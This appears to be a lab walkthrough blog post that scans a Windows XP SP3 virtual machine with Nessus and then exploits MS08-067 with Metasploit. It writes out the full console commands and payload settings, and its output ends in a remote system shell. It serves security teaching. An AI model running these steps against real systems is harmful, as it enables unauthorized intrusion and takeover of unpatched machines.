Exploiting an Windows XP Machine
A. Vulnerability Assesment
- Open the virtual windows xp sp3 again type : “ipconfig “ to know ip this windows
- Open terminal and type :”ifconfig” to know ip number the host/ backtrack
- Open Nessus with login
- chose the menu scans and click add
input the name, type,policy and scan
targets
- download report after complete scan
|
PLUGIN ID#
|
#
|
PLUGIN NAME
|
SEVERITY
|
|
35362
|
1
|
MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code
Execution (958687) (uncredentialed check)
|
High Severity problem(s) found
|
|
34477
|
1
|
MS08-067: Microsoft Windows Server Service Crafted RPC Request
Handling Remote Code Execution (958644) (uncredentialed check)
|
High Severity problem(s) found
|
|
57608
|
1
|
SMB Signing Disabled
|
Medium Severity problem(s) found
|
|
26920
|
1
|
Microsoft Windows SMB NULL Session Authentication
|
Medium Severity problem(s) found
|
|
11011
|
2
|
Microsoft Windows SMB Service Detection
|
Low Severity problem(s) found
|
|
54615
|
1
|
Device Type
|
Low Severity problem(s) found
|
|
45590
|
1
|
Common Platform Enumeration (CPE)
|
Low Severity problem(s) found
|
|
35716
|
1
|
Ethernet Card Manufacturer Detection
|
Low Severity problem(s) found
|
|
26917
|
1
|
Microsoft Windows SMB Registry : Nessus Cannot Access the
Windows Registry
|
Low Severity problem(s) found
|
|
25220
|
1
|
TCP/IP Timestamps Supported
|
Low Severity problem(s) found
|
|
19506
|
1
|
Nessus Scan Information
|
Low Severity problem(s) found
|
|
11936
|
1
|
OS Identification
|
Low Severity problem(s) found
|
|
11197
|
1
|
Multiple Ethernet Driver Frame Padding Information Disclosure
(Etherleak)
|
Low Severity problem(s) found
|
|
10884
|
1
|
Network Time Protocol (NTP) Server Detection
|
Low Severity problem(s) found
|
|
10785
|
1
|
Microsoft Windows SMB NativeLanManager Remote System
Information Disclosure
|
Low Severity problem(s) found
|
|
10394
|
1
|
Microsoft Windows SMB Log In Possible
|
Low Severity problem(s) found
|
|
10287
|
1
|
Traceroute Information
|
Low Severity problem(s) found
|
|
10150
|
1
|
Windows NetBIOS / SMB Remote Host Information Disclosure
|
Low Severity problem(s) found
|
|
10114
|
1
|
ICMP Timestamp Request Remote Date Disclosure
|
Low Severity problem(s) found
|
B.
Exploit
1.
open the console and type :
msfconsole
root@BT:~# msfconsole
_
_
/
\ / \ __ _ __
/_/ __
| |\ /
| _____ \ \ ___ _____ | | /
\ _ \ \
| | \/| | | ___\ |- -| /\
/ __\ | -__/ | | | | || | |-
-|
|_|
| | | _|__ | |_ / -\ __\ \
| | | |_ \__/ | | | |_
|/ |____/ \___\/ /\
\___/ \/ \__|
|_\ \___\
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary -
128 post
+ -- --=[ 238 payloads - 27 encoders - 8
nops
=[ svn r14551 updated 14 days ago (2012.01.14)
Warning: This copy of the Metasploit
Framework was last updated 14 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
2.
I searching for the MS08-067
NetAPI exploit in the Framework at.
msf > search ms08_067_netapi
Matching Modules
================
Name
Disclosure Date Rank Description
----
--------------- ---- -----------
exploit/windows/smb/ms08_067_netapi
2008-10-28 great Microsoft Server Service Relative Path Stack
Corruption
3. after having found
exploit,i type:
msf > use windows/smb/ms08_067_netapi
4.
next, at I set the payload as
Windows-based Meterpreter bind_tcp, which, if successful, will start a
connection on the target and connect back to the attacking machine.
msf
exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
5. type show
targets to identify the system want to target
msf
exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
10 Windows 2003 SP1 Japanese (NO
NX)
11 Windows 2003 SP2 English (NO
NX)
12 Windows 2003 SP2 English (NX)
13 Windows 2003 SP2 German (NO
NX)
14 Windows 2003 SP2 German (NX)
15 Windows XP SP2 Arabic (NX)
16 Windows XP SP2 Chinese -
Traditional / Taiwan (NX)
17 Windows XP SP2 Chinese -
Simplified (NX)
18 Windows XP SP2 Chinese -
Traditional (NX)
19 Windows XP SP2 Czech (NX)
2 Windows XP SP0/SP1 Universal
20 Windows XP SP2 Danish (NX)
21 Windows XP SP2 German (NX)
22 Windows XP SP2 Greek (NX)
23 Windows XP SP2 Spanish (NX)
24 Windows XP SP2 Finnish (NX)
25 Windows XP SP2 French (NX)
26 Windows XP SP2 Hebrew (NX)
27 Windows XP SP2 Hungarian (NX)
28 Windows XP SP2 Italian (NX)
29 Windows XP SP2 Japanese (NX)
3 Windows XP SP2 English
(AlwaysOn NX)
30 Windows XP SP2 Korean (NX)
31 Windows XP SP2 Dutch (NX)
32
Windows XP SP2 Norwegian (NX)
33 Windows XP SP2 Polish (NX)
34 Windows XP SP2 Portuguese -
Brazilian (NX)
35 Windows XP SP2 Portuguese (NX)
36 Windows XP SP2 Russian (NX)
37 Windows XP SP2 Swedish (NX)
38 Windows XP SP2 Turkish (NX)
39 Windows XP SP3 Arabic (NX)
4 Windows XP SP2 English (NX)
40 Windows XP SP3 Chinese -
Traditional / Taiwan (NX)
41 Windows XP SP3 Chinese -
Simplified (NX)
42 Windows XP SP3 Chinese -
Traditional (NX)
43 Windows XP SP3 Czech (NX)
44 Windows XP SP3 Danish (NX)
45 Windows XP SP3 German (NX)
46 Windows XP SP3 Greek (NX)
47 Windows XP SP3 Spanish (NX)
48 Windows XP SP3 Finnish (NX)
49 Windows XP SP3 French (NX)
5 Windows XP SP3 English
(AlwaysOn NX)
50 Windows XP SP3 Hebrew (NX)
51 Windows XP SP3 Hungarian (NX)
52 Windows XP SP3 Italian (NX)
53 Windows XP SP3 Japanese (NX)
54 Windows XP SP3 Korean (NX)
55 Windows XP SP3 Dutch (NX)
56 Windows XP SP3 Norwegian (NX)
57 Windows XP SP3 Polish (NX)
58 Windows XP SP3 Portuguese -
Brazilian (NX)
59 Windows XP SP3 Portuguese (NX)
6 Windows XP SP3 English (NX)
60 Windows XP SP3 Russian (NX)
61 Windows XP SP3 Swedish (NX)
62 Windows XP SP3 Turkish (NX)
63 Windows 2003 SP2 Japanese (NO
NX)
7 Windows 2003 SP0 Universal
8 Windows 2003 SP1 English (NO
NX)
9 Windows 2003 SP1 English (NX)
6. I then set out target to Windows XP SP3
English(Always on NX)
msf
exploit(ms08_067_netapi) > set target 5
target => 5
7. At I set the IP address of our target
machine which, by defining the RHOST value, is vulnerable to the MS08-067
exploit.
msf
exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
8. type: set LHOST “IP address attacking
machine”
msf
exploit(ms08_067_netapi) > set LHOST 192.168.56.100
LHOST => 192.168.56.100
9. and type the LPORT option at specifies
the port to which our attacker machine will listen for a connection from our
target.
msf
exploit(ms08_067_netapi) > set LPORT 8080
LPORT => 8080
10. Enter show options to make sure that
the options are setup corectly.
msf
exploit(ms08_067_netapi) > show options
Module options
(exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required
Description
---- --------------- --------
-----------
RHOST 192.168.56.101 yes
The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options
(windows/meterpreter/bind_tcp):
Name Current Setting Required
Description
---- --------------- --------
-----------
EXITFUNC thread yes Exit technique: seh, thread, process,
none
LPORT 8080 yes The listen port
RHOST 192.168.56.101 no
The target address
Exploit target:
Id Name
-- ----
5 Windows XP SP3 English
(AlwaysOn NX)
11. type exploit at initiates our exploit
and attempts to attack the target
msf
exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Attempting to trigger the
vulnerability...
[*] Sending stage (752128 bytes) to
192.168.56.101
[*] Meterpreter session 1 opened
(192.168.56.1:48149 -> 192.168.56.101:8080) at 2012-01-28 01:07:04 +0700
12. Finally type shell to into an
interactive command shell on the target
meterpreter > shell
Process 1172 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
where IG in your report? do you remmember the pyramid phase? please edit your report!
BalasHapus-=IS2C=-